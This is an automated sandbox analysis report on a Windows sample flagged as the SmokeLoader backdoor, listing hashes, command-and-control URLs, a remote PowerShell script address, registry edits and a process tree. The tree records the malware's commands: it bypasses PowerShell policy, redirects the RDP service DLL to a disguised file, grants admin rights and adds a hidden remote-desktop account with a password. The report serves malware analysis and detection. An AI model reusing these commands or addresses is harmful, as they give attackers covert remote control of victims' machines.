Analysis
-
max time kernel
151s -
max time network
157s -
platform
windows10_x64 -
resource
win10-en-20210920 -
submitted
20-10-2021 06:21
Static task
static1
Behavioral task
behavioral1
Sample
4d093da4d7c10d4b14a54f4793fee6ce.exe
Resource
win7-en-20211014
Behavioral task
behavioral2
Sample
4d093da4d7c10d4b14a54f4793fee6ce.exe
Resource
win10-en-20210920
General
-
Target
4d093da4d7c10d4b14a54f4793fee6ce.exe
-
Size
233KB
-
MD5
4d093da4d7c10d4b14a54f4793fee6ce
-
SHA1
1d726d4ed85efb342065713c40f968f660029fe8
-
SHA256
2d320ee3c680e6b5c2cbf5a781895dac33cf08190e3db8805dd9775ec4bd87d3
-
SHA512
6ca23d7dca9ad314acc54f04186b0eaa96272a76a209c39edd897f27822c9e65a9e20f5736dbab5c06e7754fb442094dae88e178be1780670ba155d622b404a6
Malware Config
Extracted
https://raw.githubusercontent.com/sqlitey/sqlite/master/speed.ps1
Extracted
smokeloader
2020
http://directorycart.com/upload/
http://tierzahnarzt.at/upload/
http://streetofcards.com/upload/
http://ycdfzd.com/upload/
http://successcoachceo.com/upload/
http://uhvu.cn/upload/
http://japanarticle.com/upload/
Signatures
-
SmokeLoader
Modular backdoor trojan in use since 2014.
-
suricata: ET MALWARE ServHelper CnC Inital Checkin
suricata: ET MALWARE ServHelper CnC Inital Checkin
-
suricata: ET MALWARE Terse alphanumeric executable downloader high likelihood of being hostile
suricata: ET MALWARE Terse alphanumeric executable downloader high likelihood of being hostile
-
Grants admin privileges 1 TTPs
Uses net.exe to modify the user's privileges.
-
Blocklisted process makes network request 9 IoCs
Processes:
powershell.exeflow pid Process 48 3136 powershell.exe 50 3136 powershell.exe 51 3136 powershell.exe 52 3136 powershell.exe 54 3136 powershell.exe 56 3136 powershell.exe 58 3136 powershell.exe 60 3136 powershell.exe 62 3136 powershell.exe -
Downloads MZ/PE file
-
Executes dropped EXE 1 IoCs
Processes:
93B0.exepid Process 3716 93B0.exe -
Modifies RDP port number used by Windows 1 TTPs
-
Sets DLL path for service in the registry 2 TTPs
-
Processes:
resource yara_rule behavioral2/files/0x0003000000015296-366.dat upx behavioral2/files/0x00020000000152d8-367.dat upx -
Deletes itself 1 IoCs
Processes:
pid Process 3028 -
Loads dropped DLL 2 IoCs
Processes:
pid Process 3396 3396 -
Drops file in Program Files directory 4 IoCs
Processes:
powershell.exedescription ioc Process File opened for modification C:\Program Files\Uninstall Information\IE40.UserAgent\IE40.UserAgent.DAT powershell.exe File opened for modification C:\Program Files\Uninstall Information\IE40.UserAgent\IE40.UserAgent.INI powershell.exe File opened for modification C:\Program Files\Uninstall Information\IE.HKCUZoneInfo\IE.HKCUZoneInfo.DAT powershell.exe File opened for modification C:\Program Files\Uninstall Information\IE.HKCUZoneInfo\IE.HKCUZoneInfo.INI powershell.exe -
Drops file in Windows directory 19 IoCs
Processes:
powershell.exepowershell.exedescription ioc Process File opened for modification C:\Windows\branding\mediasrv.png powershell.exe File opened for modification C:\Windows\branding\mediasvc.png powershell.exe File opened for modification C:\Windows\SERVIC~2\NETWOR~1\AppData\Local\Temp\RGIECB0.tmp powershell.exe File created C:\Windows\branding\mediasvc.png powershell.exe File created C:\Windows\SERVIC~2\NETWOR~1\AppData\Local\Temp\TMP4352$.TMP powershell.exe File opened for modification C:\Windows\SERVIC~2\NETWOR~1\AppData\Local\Temp\RGIEC8E.tmp powershell.exe File opened for modification C:\Windows\SERVIC~2\NETWOR~1\AppData\Local\Temp\RGIECC0.tmp powershell.exe File created C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive powershell.exe File created C:\Windows\branding\mediasrv.png powershell.exe File opened for modification C:\Windows\branding\Basebrd powershell.exe File opened for modification C:\Windows\branding\ShellBrd powershell.exe File created C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\__PSScriptPolicyTest_pvfy4sw5.244.psm1 powershell.exe File opened for modification C:\Windows\SERVIC~2\NETWOR~1\AppData\Local\Temp\RGIECD1.tmp powershell.exe File opened for modification C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Microsoft\Windows\INetCache\counters2.dat powershell.exe File created C:\Windows\branding\wupsvc.jpg powershell.exe File opened for modification C:\Windows\branding\wupsvc.jpg powershell.exe File created C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\__PSScriptPolicyTest_m14qlsb2.zpb.ps1 powershell.exe File opened for modification C:\Windows\SERVIC~2\NETWOR~1\AppData\Local\Temp\RGIECAF.tmp powershell.exe File created C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log powershell.exe -
Checks SCSI registry key(s) 3 TTPs 3 IoCs
SCSI information is often read in order to detect sandboxing environments.
Processes:
4d093da4d7c10d4b14a54f4793fee6ce.exedescription ioc Process Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI 4d093da4d7c10d4b14a54f4793fee6ce.exe Key enumerated \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI 4d093da4d7c10d4b14a54f4793fee6ce.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI 4d093da4d7c10d4b14a54f4793fee6ce.exe -
Modifies data under HKEY_USERS 64 IoCs
Processes:
powershell.exeWMIC.exedescription ioc Process Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\4\Icon = "inetcpl.cpl#00004481" powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\CA powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\Advanced INF Setup\IE40.UserAgent\RegBackup\0.map powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\1\ powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\Advanced INF Setup\IE.HKCUZoneInfo\RegBackup powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0\PMDisplayName = "My Computer [Protected Mode]" powershell.exe Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\4\1200 = "3" powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\SmartCardRoot powershell.exe Set value (data) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Advanced INF Setup\IE40.UserAgent\RegBackup\0\ef29a4ec885fa451 = 2c0053006f006600740077006100720065005c004d006900630072006f0073006f00660074005c00570069006e0064006f00770073005c00430075007200720065006e007400560065007200730069006f006e005c0049006e007400650072006e00650074002000530065007400740069006e00670073002c00550073006500720020004100670065006e0074002c000000010054004d006f007a0069006c006c0061002f0035002e0030002000280063006f006d00700061007400690062006c0065003b0020004d00530049004500200039002e0030003b002000570069006e003300320029000000000000000000 powershell.exe Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\0\1200 = "3" powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\Root\CTLs powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\trust\CRLs powershell.exe Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\4\CurrentLevel = "0" powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\Disallowed\CTLs powershell.exe Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\2\1200 = "3" powershell.exe Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyByPass = "0" powershell.exe Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "0" powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\CA\CTLs powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\TrustedPeople powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\1\ powershell.exe Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\4\1400 = "3" powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\2\PMDisplayName = "Trusted sites [Protected Mode]" powershell.exe Set value (data) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Advanced INF Setup\IE.HKCUZoneInfo\RegBackup\0\e1be3f182420a0a0 = 2c0053006f006600740077006100720065005c004d006900630072006f0073006f00660074005c00570069006e0064006f00770073005c00430075007200720065006e007400560065007200730069006f006e005c0049006e007400650072006e00650074002000530065007400740069006e00670073002c000000 powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\1 powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\4\PMDisplayName = "Restricted sites [Protected Mode]" powershell.exe Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProtocolDefaults\ftp = "3" powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\1\PMDisplayName = "Local intranet [Protected Mode]" powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0\PMDisplayName = "Computer [Protected Mode]" powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\Root\Certificates powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\4\Icon = "inetcpl.cpl#00004481" powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0\DisplayName = "Computer" powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ WMIC.exe Key created \REGISTRY\USER\S-1-5-20\Software\Policies\Microsoft\SystemCertificates\CA\Certificates powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Policies\Microsoft\SystemCertificates\TrustedPeople powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\2\LowIcon = "inetcpl.cpl#005424" powershell.exe Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0\1200 = "0" powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\CA\CRLs powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software powershell.exe Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\1\CurrentLevel = "0" powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\3\DisplayName = "Internet" powershell.exe Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\3\1200 = "3" powershell.exe Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\4\1400 = "3" powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProtocolDefaults\ powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\Domains\ powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\0\LowIcon = "inetcpl.cpl#005422" powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\Ranges powershell.exe Set value (data) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZonesSecurityUpgrade = a63109125baed701 powershell.exe Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\SelfHealCount = "1" powershell.exe Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3\CurrentLevel = "70912" powershell.exe Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\1\2500 = "3" powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\CA\Certificates powershell.exe Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0\1400 = "0" powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\Ranges\ powershell.exe Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\1\CurrentLevel = "66816" powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\4\Description = "This zone contains Web sites that could potentially damage your computer or data." powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\0\DisplayName = "My Computer" powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\1\Icon = "shell32.dll#0018" powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Policies\Microsoft\SystemCertificates\trust\Certificates powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\Advanced INF Setup powershell.exe -
Modifies registry key 1 TTPs 1 IoCs
-
Runs net.exe
-
Script User-Agent 4 IoCs
Uses user-agent string associated with script host/environment.
Processes:
description flow ioc HTTP User-Agent header 50 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) HTTP User-Agent header 51 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) HTTP User-Agent header 52 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) HTTP User-Agent header 54 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) -
Suspicious behavior: EnumeratesProcesses 64 IoCs
Processes:
4d093da4d7c10d4b14a54f4793fee6ce.exepid Process 2180 4d093da4d7c10d4b14a54f4793fee6ce.exe 2180 4d093da4d7c10d4b14a54f4793fee6ce.exe 3028 3028 3028 3028 3028 3028 3028 3028 3028 3028 3028 3028 3028 3028 3028 3028 3028 3028 3028 3028 3028 3028 3028 3028 3028 3028 3028 3028 3028 3028 3028 3028 3028 3028 3028 3028 3028 3028 3028 3028 3028 3028 3028 3028 3028 3028 3028 3028 3028 3028 3028 3028 3028 3028 3028 3028 3028 3028 3028 3028 3028 3028 -
Suspicious behavior: GetForegroundWindowSpam 1 IoCs
Processes:
pid Process 3028 -
Suspicious behavior: LoadsDriver 2 IoCs
Processes:
pid Process 628 628 -
Suspicious behavior: MapViewOfSection 1 IoCs
Processes:
4d093da4d7c10d4b14a54f4793fee6ce.exepid Process 2180 4d093da4d7c10d4b14a54f4793fee6ce.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
Processes:
powershell.exepowershell.exepowershell.exepowershell.exedescription pid Process Token: SeDebugPrivilege 3352 powershell.exe Token: SeDebugPrivilege 2512 powershell.exe Token: SeIncreaseQuotaPrivilege 2512 powershell.exe Token: SeSecurityPrivilege 2512 powershell.exe Token: SeTakeOwnershipPrivilege 2512 powershell.exe Token: SeLoadDriverPrivilege 2512 powershell.exe Token: SeSystemProfilePrivilege 2512 powershell.exe Token: SeSystemtimePrivilege 2512 powershell.exe Token: SeProfSingleProcessPrivilege 2512 powershell.exe Token: SeIncBasePriorityPrivilege 2512 powershell.exe Token: SeCreatePagefilePrivilege 2512 powershell.exe Token: SeBackupPrivilege 2512 powershell.exe Token: SeRestorePrivilege 2512 powershell.exe Token: SeShutdownPrivilege 2512 powershell.exe Token: SeDebugPrivilege 2512 powershell.exe Token: SeSystemEnvironmentPrivilege 2512 powershell.exe Token: SeRemoteShutdownPrivilege 2512 powershell.exe Token: SeUndockPrivilege 2512 powershell.exe Token: SeManageVolumePrivilege 2512 powershell.exe Token: 33 2512 powershell.exe Token: 34 2512 powershell.exe Token: 35 2512 powershell.exe Token: 36 2512 powershell.exe Token: SeDebugPrivilege 1412 powershell.exe Token: SeIncreaseQuotaPrivilege 1412 powershell.exe Token: SeSecurityPrivilege 1412 powershell.exe Token: SeTakeOwnershipPrivilege 1412 powershell.exe Token: SeLoadDriverPrivilege 1412 powershell.exe Token: SeSystemProfilePrivilege 1412 powershell.exe Token: SeSystemtimePrivilege 1412 powershell.exe Token: SeProfSingleProcessPrivilege 1412 powershell.exe Token: SeIncBasePriorityPrivilege 1412 powershell.exe Token: SeCreatePagefilePrivilege 1412 powershell.exe Token: SeBackupPrivilege 1412 powershell.exe Token: SeRestorePrivilege 1412 powershell.exe Token: SeShutdownPrivilege 1412 powershell.exe Token: SeDebugPrivilege 1412 powershell.exe Token: SeSystemEnvironmentPrivilege 1412 powershell.exe Token: SeRemoteShutdownPrivilege 1412 powershell.exe Token: SeUndockPrivilege 1412 powershell.exe Token: SeManageVolumePrivilege 1412 powershell.exe Token: 33 1412 powershell.exe Token: 34 1412 powershell.exe Token: 35 1412 powershell.exe Token: 36 1412 powershell.exe Token: SeDebugPrivilege 3496 powershell.exe Token: SeIncreaseQuotaPrivilege 3496 powershell.exe Token: SeSecurityPrivilege 3496 powershell.exe Token: SeTakeOwnershipPrivilege 3496 powershell.exe Token: SeLoadDriverPrivilege 3496 powershell.exe Token: SeSystemProfilePrivilege 3496 powershell.exe Token: SeSystemtimePrivilege 3496 powershell.exe Token: SeProfSingleProcessPrivilege 3496 powershell.exe Token: SeIncBasePriorityPrivilege 3496 powershell.exe Token: SeCreatePagefilePrivilege 3496 powershell.exe Token: SeBackupPrivilege 3496 powershell.exe Token: SeRestorePrivilege 3496 powershell.exe Token: SeShutdownPrivilege 3496 powershell.exe Token: SeDebugPrivilege 3496 powershell.exe Token: SeSystemEnvironmentPrivilege 3496 powershell.exe Token: SeRemoteShutdownPrivilege 3496 powershell.exe Token: SeUndockPrivilege 3496 powershell.exe Token: SeManageVolumePrivilege 3496 powershell.exe Token: 33 3496 powershell.exe -
Suspicious use of FindShellTrayWindow 2 IoCs
Processes:
pid Process 3028 3028 -
Suspicious use of SendNotifyMessage 2 IoCs
Processes:
pid Process 3028 3028 -
Suspicious use of WriteProcessMemory 64 IoCs
Processes:
93B0.exepowershell.execsc.exenet.execmd.execmd.exenet.execmd.execmd.exenet.execmd.exenet.execmd.exenet.execmd.exenet.execmd.exenet.execmd.exenet.execmd.exenet.exedescription pid Process procid_target PID 3028 wrote to memory of 3716 3028 71 PID 3028 wrote to memory of 3716 3028 71 PID 3716 wrote to memory of 3352 3716 93B0.exe 73 PID 3716 wrote to memory of 3352 3716 93B0.exe 73 PID 3352 wrote to memory of 1136 3352 powershell.exe 75 PID 3352 wrote to memory of 1136 3352 powershell.exe 75 PID 1136 wrote to memory of 836 1136 csc.exe 76 PID 1136 wrote to memory of 836 1136 csc.exe 76 PID 3352 wrote to memory of 2512 3352 powershell.exe 77 PID 3352 wrote to memory of 2512 3352 powershell.exe 77 PID 3352 wrote to memory of 1412 3352 powershell.exe 80 PID 3352 wrote to memory of 1412 3352 powershell.exe 80 PID 3352 wrote to memory of 3496 3352 powershell.exe 82 PID 3352 wrote to memory of 3496 3352 powershell.exe 82 PID 3352 wrote to memory of 1620 3352 powershell.exe 86 PID 3352 wrote to memory of 1620 3352 powershell.exe 86 PID 3352 wrote to memory of 1164 3352 powershell.exe 87 PID 3352 wrote to memory of 1164 3352 powershell.exe 87 PID 3352 wrote to memory of 1716 3352 powershell.exe 88 PID 3352 wrote to memory of 1716 3352 powershell.exe 88 PID 3352 wrote to memory of 3792 3352 powershell.exe 89 PID 3352 wrote to memory of 3792 3352 powershell.exe 89 PID 3792 wrote to memory of 3768 3792 net.exe 90 PID 3792 wrote to memory of 3768 3792 net.exe 90 PID 3352 wrote to memory of 348 3352 powershell.exe 91 PID 3352 wrote to memory of 348 3352 powershell.exe 91 PID 348 wrote to memory of 3652 348 cmd.exe 92 PID 348 wrote to memory of 3652 348 cmd.exe 92 PID 3652 wrote to memory of 3592 3652 cmd.exe 93 PID 3652 wrote to memory of 3592 3652 cmd.exe 93 PID 3592 wrote to memory of 3208 3592 net.exe 94 PID 3592 wrote to memory of 3208 3592 net.exe 94 PID 3352 wrote to memory of 3648 3352 powershell.exe 95 PID 3352 wrote to memory of 3648 3352 powershell.exe 95 PID 3648 wrote to memory of 2092 3648 cmd.exe 96 PID 3648 wrote to memory of 2092 3648 cmd.exe 96 PID 2092 wrote to memory of 2136 2092 cmd.exe 97 PID 2092 wrote to memory of 2136 2092 cmd.exe 97 PID 2136 wrote to memory of 2988 2136 net.exe 98 PID 2136 wrote to memory of 2988 2136 net.exe 98 PID 3136 wrote to memory of 836 3136 cmd.exe 102 PID 3136 wrote to memory of 836 3136 cmd.exe 102 PID 836 wrote to memory of 1136 836 net.exe 103 PID 836 wrote to memory of 1136 836 net.exe 103 PID 404 wrote to memory of 2512 404 cmd.exe 106 PID 404 wrote to memory of 2512 404 cmd.exe 106 PID 2512 wrote to memory of 860 2512 net.exe 107 PID 2512 wrote to memory of 860 2512 net.exe 107 PID 1532 wrote to memory of 4080 1532 cmd.exe 110 PID 1532 wrote to memory of 4080 1532 cmd.exe 110 PID 4080 wrote to memory of 2312 4080 net.exe 111 PID 4080 wrote to memory of 2312 4080 net.exe 111 PID 1824 wrote to memory of 2240 1824 cmd.exe 114 PID 1824 wrote to memory of 2240 1824 cmd.exe 114 PID 2240 wrote to memory of 1692 2240 net.exe 115 PID 2240 wrote to memory of 1692 2240 net.exe 115 PID 1924 wrote to memory of 3284 1924 cmd.exe 118 PID 1924 wrote to memory of 3284 1924 cmd.exe 118 PID 3284 wrote to memory of 2164 3284 net.exe 119 PID 3284 wrote to memory of 2164 3284 net.exe 119 PID 316 wrote to memory of 4088 316 cmd.exe 122 PID 316 wrote to memory of 4088 316 cmd.exe 122 PID 4088 wrote to memory of 4032 4088 net.exe 123 PID 4088 wrote to memory of 4032 4088 net.exe 123
Processes
-
C:\Users\Admin\AppData\Local\Temp\4d093da4d7c10d4b14a54f4793fee6ce.exe"C:\Users\Admin\AppData\Local\Temp\4d093da4d7c10d4b14a54f4793fee6ce.exe"1⤵
- Checks SCSI registry key(s)
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
PID:2180
-
C:\Users\Admin\AppData\Local\Temp\93B0.exeC:\Users\Admin\AppData\Local\Temp\93B0.exe1⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:3716 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" -ep bypass & 'C:\Users\Admin\AppData\Local\Temp\\ready.ps1'2⤵
- Drops file in Windows directory
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:3352 -
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\zr25ba0j\zr25ba0j.cmdline"3⤵
- Suspicious use of WriteProcessMemory
PID:1136 -
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeC:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESABCC.tmp" "c:\Users\Admin\AppData\Local\Temp\zr25ba0j\CSCA8357C9483DE41CCBAB4D0DC3869C74B.TMP"4⤵PID:836
-
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile3⤵
- Suspicious use of AdjustPrivilegeToken
PID:2512
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile3⤵
- Suspicious use of AdjustPrivilegeToken
PID:1412
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile3⤵
- Suspicious use of AdjustPrivilegeToken
PID:3496
-
-
C:\Windows\system32\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\System\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /v PortNumber /t REG_DWORD /d 0x1C21 /f3⤵PID:1620
-
-
C:\Windows\system32\reg.exe"C:\Windows\system32\reg.exe" add HKLM\system\currentcontrolset\services\TermService\parameters /v ServiceDLL /t REG_EXPAND_SZ /d C:\Windows\branding\mediasrv.png /f3⤵
- Modifies registry key
PID:1164
-
-
C:\Windows\system32\reg.exe"C:\Windows\system32\reg.exe" add "HKLM\SOFTWARE\Policies\Microsoft\Windows NT\Terminal Services" /v fEnableWddmDriver /t reg_dword /d 0 /f3⤵PID:1716
-
-
C:\Windows\system32\net.exe"C:\Windows\system32\net.exe" localgroup Administrators "NT AUTHORITY\NETWORK SERVICE" /add3⤵
- Suspicious use of WriteProcessMemory
PID:3792 -
C:\Windows\system32\net1.exeC:\Windows\system32\net1 localgroup Administrators "NT AUTHORITY\NETWORK SERVICE" /add4⤵PID:3768
-
-
-
C:\Windows\system32\cmd.exe"C:\Windows\system32\cmd.exe" /c cmd /c net start rdpdr3⤵
- Suspicious use of WriteProcessMemory
PID:348 -
C:\Windows\system32\cmd.execmd /c net start rdpdr4⤵
- Suspicious use of WriteProcessMemory
PID:3652 -
C:\Windows\system32\net.exenet start rdpdr5⤵
- Suspicious use of WriteProcessMemory
PID:3592 -
C:\Windows\system32\net1.exeC:\Windows\system32\net1 start rdpdr6⤵PID:3208
-
-
-
-
-
C:\Windows\system32\cmd.exe"C:\Windows\system32\cmd.exe" /c cmd /c net start TermService3⤵
- Suspicious use of WriteProcessMemory
PID:3648 -
C:\Windows\system32\cmd.execmd /c net start TermService4⤵
- Suspicious use of WriteProcessMemory
PID:2092 -
C:\Windows\system32\net.exenet start TermService5⤵
- Suspicious use of WriteProcessMemory
PID:2136 -
C:\Windows\system32\net1.exeC:\Windows\system32\net1 start TermService6⤵PID:2988
-
-
-
-
-
C:\Windows\system32\cmd.exe"C:\Windows\system32\cmd.exe" /c del %temp%\*.ps1 /f3⤵PID:3960
-
-
C:\Windows\system32\cmd.exe"C:\Windows\system32\cmd.exe" /c del %temp%\*.txt /f3⤵PID:1704
-
-
-
C:\Windows\System32\cmd.execmd /C net.exe user WgaUtilAcc 000000 /del1⤵
- Suspicious use of WriteProcessMemory
PID:3136 -
C:\Windows\system32\net.exenet.exe user WgaUtilAcc 000000 /del2⤵
- Suspicious use of WriteProcessMemory
PID:836 -
C:\Windows\system32\net1.exeC:\Windows\system32\net1 user WgaUtilAcc 000000 /del3⤵PID:1136
-
-
-
C:\Windows\System32\cmd.execmd /C net.exe user WgaUtilAcc dHyhzWko /add1⤵
- Suspicious use of WriteProcessMemory
PID:404 -
C:\Windows\system32\net.exenet.exe user WgaUtilAcc dHyhzWko /add2⤵
- Suspicious use of WriteProcessMemory
PID:2512 -
C:\Windows\system32\net1.exeC:\Windows\system32\net1 user WgaUtilAcc dHyhzWko /add3⤵PID:860
-
-
-
C:\Windows\System32\cmd.execmd /C net.exe LOCALGROUP "Remote Desktop Users" WgaUtilAcc /ADD1⤵
- Suspicious use of WriteProcessMemory
PID:1532 -
C:\Windows\system32\net.exenet.exe LOCALGROUP "Remote Desktop Users" WgaUtilAcc /ADD2⤵
- Suspicious use of WriteProcessMemory
PID:4080 -
C:\Windows\system32\net1.exeC:\Windows\system32\net1 LOCALGROUP "Remote Desktop Users" WgaUtilAcc /ADD3⤵PID:2312
-
-
-
C:\Windows\System32\cmd.execmd /C net.exe LOCALGROUP "Remote Desktop Users" RSSLLXYN$ /ADD1⤵
- Suspicious use of WriteProcessMemory
PID:1824 -
C:\Windows\system32\net.exenet.exe LOCALGROUP "Remote Desktop Users" RSSLLXYN$ /ADD2⤵
- Suspicious use of WriteProcessMemory
PID:2240 -
